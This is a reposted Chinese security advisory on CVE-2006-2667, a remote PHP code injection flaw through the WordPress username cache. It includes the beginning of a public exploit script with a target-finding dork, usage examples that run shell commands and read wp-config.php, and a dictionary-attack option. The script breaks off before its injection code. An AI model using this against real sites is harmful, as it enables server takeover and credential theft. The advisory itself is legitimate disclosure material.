首页 > > 服务器技术 > 安全防护 >

WordPress用户名远程PHP代码注入漏洞

2008-04-09 04:14:42来源：互联网阅读 ()

WordPress用户名远程PHP代码注入漏洞

发布日期：2006-06-12
更新日期：2006-06-12

受影响系统：

WordPress WordPress <= 2.0.2

不受影响系统：

WordPress WordPress 2.0.3

描述：

BUGTRAQ ID: 18372
CVE(CAN) ID: CVE-2006-2667

WordPress是一款免费的论坛Blog系统。

WordPress对注册用户名的处理上存在问题，远程攻击者可能利用此漏洞在服务器上执行任意命令。

在注册或更新用户概况资料时WordPress没有正确的过滤输入便将资料存储到了Web根目录的wp-content/cache/userlogins/和wp-content/cache/users/目录的脚本中。攻击者可以利用这个漏洞通过换行字符注入并执行任意PHP代码。

<*来源：rgod （rgod@autistici.org）

链接：http://secunia.com/advisories/20271/print/
http://security.gentoo.org/glsa/glsa-200606-08.xml
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "--------------------------------------------------------------------\r\n";
echo "| WordPress <= 2.0.2 'cache' shell injection exploit |\r\n";
echo "| by rgod rgod@autistici.org |\r\n";
echo "| site: http://retrogod.altervista.org |\r\n";
echo "| dork: inurl:wp-login.php Register Username Password -echo |\r\n";
echo "--------------------------------------------------------------------\r\n";

/*
this works:
regardless of all php.ini settings,
if user registration is enabled,
against an empty or weak MySQL DB password (read explaination for details...)
*/

if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS \r\n";
echo "host: target server (ip/hostname) \r\n";
echo "path: path to WordPress \r\n";
echo "cmd: a shell command \r\n";
echo "user/pass: you need a valid user account \r\n";
echo "Options: \r\n";
echo " -D[dicrionary] specify a textfile and try dictionary attack \r\n";
echo " -p[port]: \" a port other than 80 \r\n";
echo " -P[ip:port]: \" a proxy \r\n";
echo "Examples: \r\n";
echo "php ".$argv[0]." localhost /wordpress/ your_username password ls -la -Ddic.txt\r\n";
echo "php ".$argv[0]." localhost /wordpress/ your_username password cat ./../../../wp-config.php -p81\r\n";
echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
die;
}

/* explaination:

i) wordpress stores some user informations inside cached files
in wp-content/cache/userlogins/ and wp-content/cache/users/ folders, they are
php files.
Normally they look like this:

<?php
//O:8:"stdClass":23:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:18:"suntzoi@suntzu.org";s:8:"user_url";s:0:"";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:6:"suntzu";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:8:"nickname";s:6:"suntzu";s:11:"description";s:0:"";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:14:"user_firstname";s:0:"";s:13:"user_lastname";s:0:"";s:16:"user_description";s:0:"";}
?>

but...what happens if you inject a carriage return ( chr(13)...), some php code and some
escape chars when you update your profile (ex. in "displayname" argument)?

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有